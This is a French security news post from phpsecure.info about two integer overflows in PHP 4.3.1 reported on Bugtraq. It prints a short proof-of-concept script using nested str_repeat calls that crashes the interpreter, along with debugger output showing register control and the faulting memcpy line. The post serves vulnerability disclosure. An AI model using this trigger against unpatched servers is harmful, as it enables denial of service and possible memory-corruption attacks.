:: Backends RSS
:: Forum
:: Liens
:: Articles
:: Scripts
:: Téléchargements
:: Proposer une news
:: Faire un lien
:: Equipe
:: Nous écrire
:: Presse
PHPSecure, le retour.

A quand la trilogie ?
Remake parfait
Rien de nouveau
Ca peut pas marcher 2x
                   


Search SecurePHP
DMOZ ODP Search
 Search with phpODP :
Google
 Search with google

phpsecure.info
Web
 «? phpsecure(); ?»
Proposer une news
Afficher les dernieres news sur votre site
News
mardi 08 avril | 2 Integer overflows dans php 4.3.1
Source: N/A ¬ 9545 affichages

Le 3 avril, sir Mordred (encore lui !) a annonce sur bugtraq la presence de 2 nouveaux integer overflows, cette fois ci dans le noyau de l'interpreteur.

Ces bugs se revelent tres interessants en fin de compte:

(ns) $ cat _php
#! ./php -q
str_repeat ( str_repeat ( "X", 0x2000 ), 0x100000 );
(ns) $ ./_php
STR_REPEAT: Z_STRLEN_PP(input_str): 8192
Segmentation fault
(ns) $ gdb -q ./php
(gdb) r ./_php
Starting program: /usr/accounts/toad/scripts/php ./_php
STR_REPEAT: Z_STRLEN_PP(input_str): 8192

Program received signal SIGSEGV, Segmentation fault.
0x401fcc99 in memcpy () from /lib/libc.so.6
(gdb) info reg eax
eax 0x58585858 1482184792
(gdb)

et le memcpy () qui pete:

(ns) # getl 3603 /www/services/php-4.3.1/ext/standard/string.c
3603: memcpy(result, Z_STRVAL_PP(input_str), Z_STRLEN_PP(input_str));

A vos claviers.. :)


La vuln str_repeat () sur ISS
La vuln array_pad () sur ISS

toad ± Sécurité PHP
Ajouter un commentaire
Auteur:
Email:
Titre:
Contenu:

+ En ajoutant un commentaire, vous acceptez de fournir une adresse email valide
Vos commentaires
» Aucun commentaire.

Copyright ©+ 2004 phpsecure.info - All the team - Coded by Charlie & tobozo
- Tous droits réservés - DeZign by PWD
- Powered By phpSecure(); Version 2.0 - Changelog -

phpSecure fait partie du webring PHP Francophone
[ Rejoindre le webring | Sites du webring | Sites au hasard | << Précédent | Next >> ]





















Online:

Chacun y est libre de ses actes. Or, la tendance naturelle des êtres humains est d'abuser de leur liberté, c'est-à-dire d'empiéter sur celle des autres. La plus grande menace sur la liberté, c'est la liberté elle-même. Comment défendre la liberté contre elle-même ? En garantissant à tous la sécurité. La sécurité, c'est la liberté. La sécurité, c'est la protection. La protection, c'est la surveillance. La surveillance, c'est la liberté.

Jean-Christophe Rufin ( Globalia )